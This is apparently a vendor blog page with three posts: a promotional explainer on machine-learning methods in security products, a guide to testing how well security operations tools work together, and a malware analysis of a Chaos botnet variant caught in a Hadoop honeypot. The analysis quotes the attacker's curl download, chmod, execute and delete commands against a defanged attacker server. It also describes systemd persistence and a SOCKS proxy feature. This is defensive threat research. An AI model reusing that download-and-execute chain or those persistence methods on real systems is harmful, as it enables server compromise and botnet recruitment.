Blog
/
/
February 10, 2025

From Hype to Reality: How AI is Transforming Cybersecurity Practices

AI hype is everywhere, but not many vendors are getting specific. Darktrace’s multi-layered AI combines various machine learning techniques for behavioral analytics, real-time threat detection, investigation, and autonomous response.
No items found.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
No items found.
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
10
Feb 2025

AI is everywhere, predominantly because it has changed the way humans interact with data. AI is a powerful tool for data analytics, predictions, and recommendations, but accuracy, safety, and security are paramount for operationalization.

In cybersecurity, AI-powered solutions are becoming increasingly necessary to keep up with modern business complexity and this new age of cyber-threat, marked by attacker innovation, use of AI, speed, and scale. The emergence of these new threats calls for a varied and layered approach in AI security technology to anticipate asymmetric threats.

While many cybersecurity vendors are adding AI to their products, they are not always communicating the capabilities or data used clearly. This is especially the case with Large Language Models (LLMs). Many products are adding interactive and generative capabilities which do not necessarily increase the efficacy of detection and response but rather are aligned with enhancing the analyst and security team experience and data retrieval.

Consequently, many  people erroneously conflate generative AI with other types of AI. Similarly, only 31% of security professionals report that they are “very familiar” with supervised machine learning, the type of AI most often applied in today’s cybersecurity solutions to identify threats using attack artifacts and facilitate automated responses. This confusion around AI and its capabilities can result in suboptimal cybersecurity measures, overfitting, inaccuracies due to ineffective methods/data, inefficient use of resources, and heightened exposure to advanced cyber threats.

Vendors must cut through the AI market and demystify the technology in their products for safe, secure, and accurate adoption. To that end, let’s discuss common AI techniques in cybersecurity as well as how Darktrace applies them.

Modernizing cybersecurity with AI

Machine learning has presented a significant opportunity to the cybersecurity industry, and many vendors have been using it for years. Despite the high potential benefit of applying machine learning to cybersecurity, not every AI tool or machine learning model is equally effective due to its technique, application, and data it was trained on.

Supervised machine learning and cybersecurity

Supervised machine models are trained on labeled, structured data to facilitate automation of a human-led trained tasks. Some cybersecurity vendors have been experimenting with supervised machine learning for years, with most automating threat detection based on reported attack data using big data science, shared cyber-threat intelligence, known or reported attack behavior, and classifiers.

In the last several years, however, more vendors have expanded into the behavior analytics and anomaly detection side. In many applications, this method separates the learning, when the behavioral profile is created (baselining), from the subsequent anomaly detection. As such, it does not learn continuously and requires periodic updating and re-training to try to stay up to date with dynamic business operations and new attack techniques. Unfortunately, this opens the door for a high rate of daily false positives and false negatives.

Unsupervised machine learning and cybersecurity

Unlike supervised approaches, unsupervised machine learning does not require labeled training data or human-led training. Instead, it independently analyzes data to detect compelling patterns without relying on knowledge of past threats. This removes the dependency of human input or involvement to guide learning.

However, it is constrained by input parameters, requiring a thoughtful consideration of technique and feature selection to ensure the accuracy of the outputs. Additionally, while it can discover patterns in data as they are anomaly-focused, some of those patterns may be irrelevant and distracting.

When using models for behavior analytics and anomaly detection, the outputs come in the form of anomalies rather than classified threats, requiring additional modeling for threat behavior context and prioritization. Anomaly detection performed in isolation can render resource-wasting false positives.

LLMs and cybersecurity

LLMs are a major aspect of mainstream generative AI, and they can be used in both supervised and unsupervised ways. They are pre-trained on massive volumes of data and can be applied to human language, machine language, and more.

With the recent explosion of LLMs in the market, many vendors are rushing to add generative AI to their products, using it for chatbots, Retrieval-Augmented Generation (RAG) systems, agents, and embeddings. Generative AI in cybersecurity can optimize data retrieval for defenders, summarize reporting, or emulate sophisticated phishing attacks for preventative security.

But, since this is semantic analysis, LLMs can struggle with the reasoning necessary for security analysis and detection consistently. If not applied responsibly, generative AI can cause confusion by “hallucinating,” meaning referencing invented data, without additional post-processing to decrease the impact or by providing conflicting responses due to confirmation bias in the prompts written by different security team members.

Combining techniques in a multi-layered AI approach

Each type of machine learning technique has its own set of strengths and weaknesses, so a multi-layered, multi-method approach is ideal to enhance functionality while overcoming the shortcomings of any one method.

Darktrace’s Self-Learning AI is a multi-layered engine is powered by multiple machine learning approaches, which operate in combination for cyber defense. This allows Darktrace to protect the entire digital estates of the organizations it secures, including corporate networks, cloud computing services, SaaS applications, IoT, Industrial Control Systems (ICS), and email systems.

Plugged into the organization’s infrastructure and services, our AI engine ingests and analyzes the raw data and its interactions within the environment and forms an understanding of the normal behavior, right down to the granular details of specific users and devices. The system continually revises its understanding about what is normal based on evolving evidence, continuously learning as opposed to baselining techniques.

This dynamic understanding of normal partnered with dozens of anomaly detection models means that the AI engine can identify, with a high degree of precision, events or behaviors that are both anomalous and unlikely to be benign. Understanding anomalies through the lens of many models as well as autonomously fine-tuning the models’ performances gives us a higher understanding and confidence in anomaly detection.

The next layer provides event correlation and threat behavior context to understand the risk level of an anomalous event(s). Every anomalous event is investigated by Cyber AI Analyst that uses a combination of unsupervised machine learning models to analyze logs with supervised machine learning trained on how to investigate. This provides anomaly and risk context along with investigation outcomes with explainability.

The ability to identify activity that represents the first footprints of an attacker, without any prior knowledge or intelligence, lies at the heart of the AI system’s efficacy in keeping pace with threat actor innovations and changes in tactics and techniques. It helps the human team detect subtle indicators that can be hard to spot amid the immense noise of legitimate, day-to-day digital interactions. This enables advanced threat detection with full domain visibility.

Digging deeper into AI: Mapping specific machine learning techniques to cybersecurity functions

Visibility and control are vital for the practical adoption of AI solutions, as it builds trust between human security teams and their AI tools. That is why we want to share some specific applications of AI across our solutions, moving beyond hype and buzzwords to provide grounded, technical explanations.

Darktrace’s technology helps security teams cover every stage of the incident lifecycle with a range of comprehensive analysis and autonomous investigation and response capabilities.

  1. Behavioral prediction: Our AI understands your unique organization by learning normal patterns of life. It accomplishes this with multiple clustering algorithms, anomaly detection models, Bayesian meta-classifier for autonomous fine-tuning, graph theory, and more.
  2. Real-time threat detection: With a true understanding of normal, our AI engine connects anomalous events to risky behavior using probabilistic models. 
  3. Investigation: Darktrace performs in-depth analysis and investigation of anomalies, in particular automating Level 1 of a SOC team and augmenting the rest of the SOC team through prioritization for human-led investigations. Some of these methods include supervised and unsupervised machine learning models, semantic analysis models, and graph theory.
  4. Response: Darktrace calculates the proportional action to take in order to neutralize in-progress attacks at machine speed. As a result, organizations are protected 24/7, even when the human team is out of the office. Through understanding the normal pattern of life of an asset or peer group, the autonomous response engine can isolate the anomalous/risky behavior and surgically block. The autonomous response engine also has the capability to enforce the peer group’s pattern of life when rare and risky behavior continues.
  5. Customizable model editor: This layer of customizable logic models tailors our AI’s processing to give security teams more visibility as well as the opportunity to adapt outputs, therefore increasing explainability, interpretability, control, and the ability to modify the operationalization of the AI output with auditing.

See the complete AI architecture in the paper “The AI Arsenal: Understanding the Tools Shaping Cybersecurity.”

Figure 1. Alerts can be customized in the model editor in many ways like editing the thresholds for rarity and unusualness scores above.

Machine learning is the fundamental ally in cyber defense

Traditional security methods, even those that use a small subset of machine learning, are no longer sufficient, as these tools can neither keep up with all possible attack vectors nor respond fast enough to the variety of machine-speed attacks, given their complexity compared to known and expected patterns.

Security teams require advanced detection capabilities, using multiple machine learning techniques to understand the environment, filter the noise, and take action where threats are identified.

Darktrace’s Self-Learning AI comes together to achieve behavioral prediction, real-time threat detection and response, and incident investigation, all while empowering your security team with visibility and control.

Learn how AI is Applied in Cybersecurity

Discover specifically how Darktrace applies different types of AI to improve cybersecurity efficacy and operations in this technical paper.

No items found.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
No items found.

More in this series

No items found.

Blog

/

/

April 8, 2026

How to Secure AI and Find the Gaps in Your Security Operations

secuing AI testing gaps security operationsDefault blog imageDefault blog image

What “securing AI” actually means (and doesn’t)

Security teams are under growing pressure to “secure AI” at the same pace which businesses are adopting it. But in many organizations, adoption is outpacing the ability to govern, monitor, and control it. When that gap widens, decision-making shifts from deliberate design to immediate coverage. The priority becomes getting something in place, whether that’s a point solution, a governance layer, or an extension of an existing platform, rather than ensuring those choices work together.

At the same time, AI governance is lagging adoption. 37% of organizations still lack AI adoption policies, shadow AI usage across SaaS has surged, and there are notable spikes in anomalous data uploads to generative AI services.  

First and foremost, it’s important to recognize the dual nature of AI risk. Much of the industry has focused on how attackers will use AI to move faster, scale campaigns, and evade detection. But what’s becoming just as significant is the risk introduced by AI inside the organization itself. Enterprises are rapidly embedding AI into workflows, SaaS platforms, and decision-making processes, creating new pathways for data exposure, privilege misuse, and unintended access across an already interconnected environment.

Because the introduction of complex AI systems into modern, hybrid environments is reshaping attacker behavior and exposing gaps between security functions, the challenge is no longer just having the right capabilities in place but effectively coordinating prevention, detection, investigation, response, and remediation together. As threats accelerate and systems become more interconnected, security depends on coordinated execution, not isolated tools, which is why lifecycle-based approaches to governance, visibility, behavioral oversight, and real-time control are gaining traction.

From cloud consolidation to AI systems what we can learn

We have seen a version of AI adoption before in cloud security. In the early days, tooling fragmented into posture, workload/runtime, identity, data, and more. Gradually, cloud security collapsed into broader cloud platforms. The lesson was clear: posture without runtime misses active threats; runtime without posture ignores root causes. Strong programs ran both in parallel and stitched the findings together in operations.  

Today’s AI wave stretches that lesson across every domain. Adversaries are compressing “time‑to‑tooling” using LLM‑assisted development (“vibecoding”) and recycling public PoCs at unprecedented speed. That makes it difficult to secure through siloed controls, because the risk is not confined to one layer. It emerges through interactions across layers.

Keep in mind, most modern attacks don’t succeed by defeating a single control. They succeed by moving through the gaps between systems faster than teams can connect what they are seeing. Recent exploitation waves like React2Shell show how quickly opportunistic actors operationalize fresh disclosures and chain misconfigurations to monetize at scale.

In the React2Shell window, defenders observed rapid, opportunistic exploitation and iterative payload diversity across a broad infrastructure footprint, strains that outpace signature‑first thinking.  

You can stay up to date on attacker behavior by monitoring our Inside the SOC blog page where Darktrace’s threat research team and analyst community regularly dive deep into threat finds.

Ultimately, speed met scale in the cloud era; AI adds interconnectedness and orchestration. Simple questions — What happened? Who did it? Why? How? Where else? — now cut across identities, SaaS agents, model/service endpoints, data egress, and automated actions. The longer it takes to answer, the worse the blast radius becomes.

The case for a platform approach in the age of AI

Think of security fusion as the connective tissue that lets you prevent, detect, investigate, and remediate in parallel, not in sequence. In practice, that looks like:

  1. Unified telemetry with behavioral context across identities, SaaS, cloud, network, endpoints, and email—so an anomalous action in one plane automatically informs expectations in others. (Inside‑the‑SOC investigations show this pays off when attacks hop fast between domains.)  
  1. Pre‑CVE and “in‑the‑wild” awareness feeding controls before signatures—reducing dwell time in fast exploitation windows.  
  1. Automated, bounded response that can contain likely‑malicious actions at machine speed without breaking workflows—buying analysts time to investigate with full context. (Rapid CVE coverage and exploit‑wave posts illustrate how critical those first minutes are.)  
  1. Investigation workflows that assume AI is in the loop—for both defenders and attackers. As adversaries adopt “agentic” patterns, investigations need graph‑aware, sequence‑aware reasoning to prioritize what matters early.

This isn’t theoretical. It’s reflected in the Darktrace posts that consistently draw readership: timely threat intel with proprietary visibility and executive frameworks that transform field findings into operating guidance.  

The five questions that matter (and the one that matters more)

When alerted to malicious or risky AI use, you’ll ask:

  1. What happened?
  1. Who did it?
  1. Why did they do it?
  1. How did they do it?
  1. Where else can this happen?

The sixth, more important question is: How much worse does it get while you answer the first five? The answer depends on whether your controls operate in sequence (slow) or in fused parallel (fast).

What to watch next: How the AI security market will likely evolve

Markets follow patterns. Expect an initial bloom of AI posture & governance tools, followed quickly by observability, then detection & response, and ultimately investigation & remediation capabilities that consolidate under broader platforms. That determinant won’t be marketing it’ll be attacker innovation. Analytical posts that tracked earlier waves (BeyondTrust exploitation, WSUS abuse) and AI‑era attacks (React2Shell) suggest defenders will need faster fusion across functions as adversaries use AI to widen and accelerate their playbooks.  

Bottom line: In the age of AI, seams are the new surface. The winners will be teams that collapse the distance between seeing and doing and between domains that used to operate apart.

Building the Groundwork for Secure AI: How to Test Your Stack’s True Maturity

AI doesn’t create new surfaces as much as it exposes the fragility of the seams that already exist.  

Darktrace’s own public investigations consistently show that modern attacks, from LinkedIn‑originated phishing that pivots into corporate SaaS to multi‑stage exploitation waves like BeyondTrust CVE‑2026‑1731 and React2Shell, succeed not because a single control failed, but because no control saw the whole sequence, or no system was able to respond at the speed of escalation.  

Before thinking about “AI security,” customers should ensure they’ve built a security foundation where visibility, signals, and responses can pass cleanly between domains. That requires pressure‑testing the seams.

Below are the key integration questions and stack‑maturity tests every organization should run.

1. Do your controls see the same event the same way?

Integration questions

  • When an identity behaves strangely (impossible travel, atypical OAuth grants), does that signal automatically inform your email, SaaS, cloud, and endpoint tools?
  • Do your tools normalize events in a way that lets you correlate identity → app → data → network without human stitching?

Why it matters

Darktrace’s public SOC investigations repeatedly show attackers starting in an unmonitored domain, then pivoting into monitored ones, such as phishing on LinkedIn that bypassed email controls but later appeared as anomalous SaaS behavior.

If tools can’t share or interpret each other's context, AI‑era attacks will outrun every control.

Tests you can run

  1. Shadow Identity Test
  • Create a temporary identity with no history.
  • Perform a small but unusual action: unusual browser, untrusted IP, odd OAuth request.
  • Expected maturity signal: other tools (email/SaaS/network) should immediately score the identity as high‑risk.
  1. Context Propagation Test
  • Trigger an alert in one system (e.g., endpoint anomaly) and check if other systems automatically adjust thresholds or sensitivity.
  • Low maturity signal: nothing changes unless an analyst manually intervenes.

2. Does detection trigger coordinated action, or does everything act alone?

Integration questions

  • When one system blocks or contains something, do other systems automatically tighten, isolate, or rate‑limit?
  • Does your stack support bounded autonomy — automated micro‑containment without broad business disruption?

Why it matters

In public cases like BeyondTrust CVE‑2026‑1731 exploitation, Darktrace observed rapid C2 beaconing, unusual downloads, and tunneling attempts across multiple systems. Containment windows were measured in minutes, not hours.  

Tests you can run

  1. Chain Reaction Test
  • Simulate a primitive threat (e.g., access from TOR exit node).
  • Your identity provider should challenge → email should tighten → SaaS tokens should re‑authenticate.
  • Weak seam indicator: only one tool reacts.
  1. Autonomous Boundary Test
  • Induce a low‑grade anomaly (credential spray simulation).
  • Evaluate whether automated containment rules activate without breaking legitimate workflows.

3. Can your team investigate a cross‑domain incident without swivel‑chairing?

Integration questions

  • Can analysts pivot from identity → SaaS → cloud → endpoint in one narrative, not five consoles?
  • Does your investigation tooling use graphs or sequence-based reasoning, or is it list‑based?

Why it matters

Darktrace’s Cyber AI Analyst and DIGEST research highlights why investigations must interpret structure and progression, not just standalone alerts. Attackers now move between systems faster than human triage cycles.  

Tests you can run

  1. One‑Hour Timeline Build Test
  • Pick any detection.
  • Give an analyst one hour to produce a full sequence: entry → privilege → movement → egress.
  • Weak seam indicator: they spend >50% of the hour stitching exports.
  1. Multi‑Hop Replay Test
  • Simulate an incident that crosses domains (phish → SaaS token → data access).
  • Evaluate whether the investigative platform auto‑reconstructs the chain.

4. Do you detect intent or only outcomes?

Integration questions

  • Can your stack detect the setup behaviors before an attack becomes irreversible?
  • Are you catching pre‑CVE anomalies or post‑compromise symptoms?

Why it matters

Darktrace publicly documents multiple examples of pre‑CVE detection, where anomalous behavior was flagged days before vulnerability disclosure. AI‑assisted attackers will hide behind benign‑looking flows until the very last moment.

Tests you can run

  1. Intent‑Before‑Impact Test
  • Simulate reconnaissance-like behavior (DNS anomalies, odd browsing to unknown SaaS, atypical file listing).
  • Mature systems will flag intent even without an exploit.
  1. CVE‑Window Test
  • During a real CVE patch cycle, measure detection lag vs. public PoC release.
  • Weak seam indicator: your detection rises only after mass exploitation begins.

5. Are response and remediation two separate universes?

Integration questions

  • When you contain something, does that trigger root-cause remediation workflows in identity, cloud config, or SaaS posture?
  • Does fixing a misconfiguration automatically update correlated controls?

Why it matters

Darktrace’s cloud investigations (e.g., cloud compromise analysis) emphasize that remediation must close both runtime and posture gaps in parallel.

Tests you can run

  1. Closed‑Loop Remediation Test
  • Introduce a small misconfiguration (over‑permissioned identity).
  • Trigger an anomaly.
  • Mature stacks will: detect → contain → recommend or automate posture repair.
  1. Drift‑Regression Test
  • After remediation, intentionally re‑introduce drift.
  • The system should immediately recognize deviation from known‑good baseline.

6. Do SaaS, cloud, email, and identity all agree on “normal”?

Integration questions

  • Is “normal behavior” defined in one place or many?
  • Do baselines update globally or per-tool?

Why it matters

Attackers (including AI‑assisted ones) increasingly exploit misaligned baselines, behaving “normal” to one system and anomalous to another.

Tests you can run

  1. Baseline Drift Test
  • Change the behavior of a service account for 24 hours.
  • Mature platforms will flag the deviation early and propagate updated expectations.
  1. Cross‑Domain Baseline Consistency Test
  • Compare identity’s risk score vs. cloud vs. SaaS.
  • Weak seam indicator: risk scores don’t align.

Final takeaway

Security teams shouldn’t ask:
“How do I secure AI?”

They should ask:
“Can my stack operate as one system before AI amplifies pressure on every seam?”

Only once an organization can reliably detect, correlate, and respond across domains can it safely begin to secure AI models, agents, and workflows.

Continue reading
About the author
Nabil Zoldjalali
VP, Field CISO

Blog

/

/

April 7, 2026

Darktrace Identifies New Chaos Malware Variant Exploiting Misconfigurations in the Cloud

Chaos Malware Variant Exploiting Misconfigurations in the CloudDefault blog imageDefault blog image

Introduction

To observe adversary behavior in real time, Darktrace operates a global honeypot network known as “CloudyPots”, designed to capture malicious activity across a wide range of services, protocols, and cloud platforms. These honeypots provide valuable insights into the techniques, tools, and malware actively targeting internet‑facing infrastructure.

One example of software targeted within Darktrace’s honeypots is Hadoop, an open-source framework developed by Apache that enables the distributed processing of large data sets across clusters of computers. In Darktrace’s honeypot environment, the Hadoop instance is intentionally misconfigured to allow attackers to achieve remote code execution on the service. In one example from March 2026, this enabled Darktrace to identify and further investigate activity linked to Chaos malware.

What is Chaos Malware?

First discovered by Lumen’s Black Lotus Labs, Chaos is a Go-based malware [1]. It is speculated to be of Chinese origin, based on Chinese language characters found within strings in the sample and the presence of zh-CN locale indicators. Based on code overlap, Chaos is likely an evolution of the Kaiji botnet.

Chaos has historically targeted routers and primarily spreads through SSH brute-forcing and known Common Vulnerabilities and Exposures (CVEs) in router software. It then utilizes infected devices as part of a Distributed Denial-of-Service (DDoS) botnet, as well as cryptomining.

Darktrace’s view of a Chaos Malware Compromise

The attack began when a threat actor sent a request to an endpoint on the Hadoop deployment to create a new application.

The initial infection being delivered to the unsecured endpoint.
Figure 1: The initial infection being delivered to the unsecured endpoint.

This defines a new application with an initial command to run inside the container, specified in the command field of the am-container-spec section. This, in turn, initiates several shell commands:

  • curl -L -O http://pan.tenire[.]com/down.php/7c49006c2e417f20c732409ead2d6cc0. - downloads a file from the attacker’s server, in this case a Chaos agent malware executable.
  • chmod 777 7c49006c2e417f20c732409ead2d6cc0. - sets permissions to allow all users to read, write, and execute the malware.
  • ./7c49006c2e417f20c732409ead2d6cc0. - executes the malware
  • rm -rf 7c49006c2e417f20c732409ead2d6cc0. - deletes the malware file from the disk to reduce traces of activity.

In practice, once this application is created an attacker-defined binary is downloaded from their server, executed on the system, and then removed to prevent forensic recovery. The domain pan.tenire[.]com has been previously observed in another campaign, dubbed “Operation Silk Lure”, which delivered the ValleyRAT Remote Access Trojan (RAT) via malicious job application resumes. Like Chaos, this campaign featured extensive Chinese characters throughout its stages, including within the fake resume themselves. The domain resolves to 107[.]189.10.219, a virtual private server (VPS) hosted in BuyVM’s Luxembourg location, a provider known for offering low-cost VPS services.

Analysis of the updated Chaos malware sample

Chaos has historically targeted routers and other edge devices, making compromises of Linux server environments a relatively new development. The sample observed by Darktrace in this compromise is a 64-bit ELF binary, while the majority of router hardware typically runs on ARM, MIPS, or PowerPC architecture and often 32-bit.

The malware sample used in the attack has undergone notable restructuring compared to earlier versions. The default namespace has been changed from “main_chaos” to just “main”, and several functions have been reworked. Despite these changes, the sample retains its core features, including persistence mechanisms established via systemd and a malicious keep-alive script stored at /boot/system.pub.

The creation of the systemd persistence service.
Figure 2: The creation of the systemd persistence service.

Likewise, the functions to perform DDoS attacks are still present, with methods that target the following protocols:

  • HTTP
  • TLS
  • TCP
  • UDP
  • WebSocket

However, several features such as the SSH spreader and vulnerability exploitation functions appear to have been removed. In addition, several functions that were previously believed to be inherited from Kaiji have also been changed, suggesting that the threat actors have either rewritten the malware or refactored it extensively.

A new function of the malware is a SOCKS proxy. When the malware receives a StartProxy command from the command-and-control (C2) server, it will begin listening on an attacker-controlled TCP port and operates as a SOCKS5 proxy. This enables the attacker to route their traffic via the compromised server and use it as a proxy. This capability offers several advantages: it enables the threat actor to launch attacks from the victim’s internet connection, making the activity appear to originate from the victim instead of the attacker, and it allows the attacker to pivot into internal networks only accessible from the compromised server.

The command processor for StartProxy. Due to endianness, the string is reversed.
Figure 3: The command processor for StartProxy. Due to endianness, the string is reversed.

In previous cases, other DDoS botnets, such as Aisuru, have been observed pivoting to offer proxying services to other cybercriminals. The creators of Chaos may have taken note of this trend and added similar functionality to expand their monetization options and enhance the capabilities of their own botnet, helping ensure they do not fall behind competing operators.

The sample contains an embedded domain, gmserver.osfc[.]org[.]cn, which it uses to resolve the IP of its C2 server.  At time or writing, the domain resolves to 70[.]39.181.70, an IP owned by NetLabel Global which is geolocated at Hong Kong.

Historically, the domain has also resolved to 154[.]26.209.250, owned by Kurun Cloud, a low-cost VPS provider that offers dedicated server rentals. The malware uses port 65111 for sending and receiving commands, although neither IP appears to be actively accepting connections on this port at the time of writing.

Key takeaways

While Chaos is not a new malware, its continued evolution highlights the dedication of cybercriminals to expand their botnets and enhance the capabilities at their disposal. Previously reported versions of Chaos malware already featured the ability to exploit a wide range of router CVEs, and its recent shift towards targeting Linux cloud-server vulnerabilities will further broaden its reach.

It is therefore important that security teams patch CVEs and ensure strong security configuration for applications deployed in the cloud, particularly as the cloud market continues to grow rapidly while available security tooling struggles to keep pace.

The recent shift in botnets such as Aisuru and Chaos to include proxy services as core features demonstrates that denial-of-service is no longer the only risk these botnets pose to organizations and their security teams. Proxies enable attackers to bypass rate limits and mask their tracks, enabling more complex forms of cybercrime while making it significantly harder for defenders to detect and block malicious campaigns.

Credit to Nathaniel Bill (Malware Research Engineer)
Edited by Ryan Traill (Content Manager)

Indicators of Compromise (IoCs)

ae457fc5e07195509f074fe45a6521e7fd9e4cd3cd43e42d10b0222b34f2de7a - Chaos Malware hash

182[.]90.229.95 - Attacker IP

pan.tenire[.]com (107[.]189.10.219) - Server hosting malicious binaries

gmserver.osfc[.]org[.]cn (70[.]39.181.70, 154[.]26.209.250) - Attacker C2 Server

References

[1] - https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/

Continue reading
About the author
Nathaniel Bill
Malware Research Engineer
Your data. Our AI.
Elevate your network security with Darktrace AI